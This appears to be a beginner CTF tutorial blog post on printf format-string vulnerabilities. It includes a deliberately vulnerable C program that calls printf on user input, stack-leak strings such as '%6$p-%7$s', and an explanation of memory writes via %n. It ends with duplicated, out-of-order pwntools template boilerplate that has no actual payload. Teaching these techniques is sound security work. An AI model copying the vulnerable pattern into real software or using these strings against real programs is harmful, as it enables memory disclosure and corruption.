printf is a common vulnerable in the pwn questions. Recently, I got an opportunity to try two very interesting question related to printf in MapleCTF 2022, I think it would be good if I wrote my experience about printf so that I could reinforce my understanding about printf stuff.
Anyway, I would try to explain as much as detail in the article in order to make it beginner friendly.
Hope this article can help you in printf
0x1 What is printf (string formating)
so, string format is a way to print out data by stating its format in a string.
for example, the code below will print out "Hello, printf , I'm 16 year old". We can see that string "%s" is replace by "printf" and "%d" is replaced by 0x10 (which is 16 in decimal)
1
printf("Hello, %s , I'm %d year old","printf",0x10)
all the character start with % is called format string, there are serveral different format string you can use in C.
Here is some commonly used format string, ignore %n for now. We will come to it later
1 2 3 4 5 6 7 8 9 10 11
%d integer %s char %l long int %ll long long int %p pointer %x unsigned hexadecimal %n write number of printed character in 4 byte %hn write number of printed character in 2 byte %hhn write number of printed character in 1 byte
%10$? use 10th parameter and print in format of ?
0x2 How function are called
Before talking about the printf, first thing we need to know is how a function are called and how parameter are passed.
In one words, x86 push all parameter into the stack. x64 move first 6 parameter into register and push rest parameters in to the stack.
While in x64, the stack would look like this and two paramter, 100 is saved in the rdi and 200 is saved in the rsi. Since there there are only two argument, there is no extra value pushed into the stack.
1 2 3 4
Bar Stack (current) RBP RIP Pararent Stack
0x2 Read the stack
basic idea
Here is a simple vulnerable code, can you figure out a way to let program print out *buf.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
#include <stdio.h>
void main() { int x = 0x1337; char *buf = "my super secret"; char s[0x20]; printf("hello here is my number %d\n", x); while (1) { puts("please enter: "); fgets(s, 0x20, stdin); puts("You Enter: "); printf(s); //!! here } }
printf(s) give us the opportunity. As I mentioned in the Part1, the computer didn't care about what parameter you actually pass in. It read whatever is in the register and on the stack.
Assume you put %p-%p-%p-%p in the string s. The computer don't know you didn't pass other 4 parameter. It will just read whatever is store in the register and stack.
For example ,in x64, it will print out address in "rsi-rdx-rcx-r8".
So, if we continue to print out, and used out all the 6 register. printf will assume there is some data in the stack, so printf will then get data from stack and print it out.
This give us a way off leaking data on the stack.
verification
Lets check with a debugger.
First before call printf, the stack looks like this, we can see our x is at rsp, and buf is locate right under rsp.
Lets enter %p%p%p%p%p %p-%s.
The first 5 %p is used for the rest of 5 registers
than x and buf is printed by by format %p and %s
We got exactly what we want
we can also use %p%p%p%p%p %p-%p to print out the address of buf
1 2
You Enter: 0x56206ad2e2a0(nil)0x7fdee909b1e70xc(nil) 0x1337-0x562069b06004
simpler method
using %p%p%p%p%p %p-%p is ok when we have large input size. But what happen if we don't have enough input size.
We can use %num$format to get the same result.
for example, we want to get the x and buf. We know from previous, we can get x from 6th parameter and buf from 7th parameter.
so, we can use %6$p-%7$s as a substitution. And we got the same result as %p%p%p%p%p %p-%s
0x3 Write on the stack
basic idea
in order to write data by printf, We need use the debug features of printf - %n, %hn, and %hhn.
basicly, %n allow you write total number of character printed into a int pointer.
For example, following code will change x to 5 after printf.
1 2 3 4 5 6 7 8 9
#include <stdio.h>
void main() { int x = 0; printf("before, x = %d\n",x); // here x = 0 printf("12345%n\n",&x); printf("after, x = %d\n",x); // this will print x = 5 }
example
lets modify the example in the read. In this example, we need to find a way changing x to 0x1337.
# Set up pwntools for the correct architecture exe = context.binary = ELF(BinaryInfo.exe) exe_rop = ROP(exe) if BinaryInfo.libc != "": libc = ELF(BinaryInfo.libc) libc_rop = ROP(libc) else: libc = None libc_rop = None
# Many built-in settings can be controlled on the command-line and show up # in "args". For example, to dump all data sent/received, and disable ASLR # for all created processes... # ./exploit.py DEBUG NOASLR # ./exploit.py GDB HOST=example.com PORT=4141 host = args.HOST or BinaryInfo.host port = int(args.PORT or BinaryInfo.port)
def start_remote(argv=[], *a, **kw): '''Connect to the process on the remote host''' io = connect(host, port) if args.GDB: gdb.attach(io, gdbscript=gdbscript) return io
def start(argv=[], *a, **kw): '''Start the exploit against the target.''' if args.LOCAL: return start_local(argv, *a, **kw) else: return start_remote(argv, *a, **kw)
# =========================================================== # EXPLOIT GOES HERE # =========================================================== # Arch: amd64-64-little # RELRO: Full RELRO # Stack: No canary found # NX: NX enabled # PIE: PIE enabled
# Specify your GDB script here for debugging # GDB will be launched if the exploit is run via e.g. # ./exploit.py GDB gdbscript = ''' tbreak main continue '''.format(**locals())
def wait_for_debugger(io): if args.LOCAL and input("debugger?") == "y\n": pid = util.proc.pidof(io)[0] log_print("The pid is: " + str(pid)) util.proc.wait_for_debugger(pid) log_print("press enter to continue")
#!/usr/bin/env python3 # -*- coding: utf-8 -*- # This exploit template was generated via: # $ pwn template --host localhost --port 1442 pwintf from pwn import *
# Set up pwntools for the correct architecture exe = context.binary = ELF('pwintf') libc = ELF('libc.so.6')
# Many built-in settings can be controlled on the command-line and show up # in "args". For example, to dump all data sent/received, and disable ASLR # for all created processes... # ./exploit.py DEBUG NOASLR # ./exploit.py GDB HOST=example.com PORT=4141 host = args.HOST or 'localhost' port = int(args.PORT or 1442)
def start_remote(argv=[], *a, **kw): '''Connect to the process on the remote host''' io = connect(host, port) if args.GDB: gdb.attach(io, gdbscript=gdbscript) return io
def start(argv=[], *a, **kw): '''Start the exploit against the target.''' if args.LOCAL: return start_local(argv, *a, **kw) else: return start_remote(argv, *a, **kw)
# Specify your GDB script here for debugging # GDB will be launched if the exploit is run via e.g. # ./exploit.py GDB gdbscript = ''' tbreak main continue '''.format(**locals())
#=========================================================== # EXPLOIT GOES HERE #=========================================================== # Arch: amd64-64-little # RELRO: Full RELRO # Stack: No canary found # NX: NX enabled # PIE: PIE enabled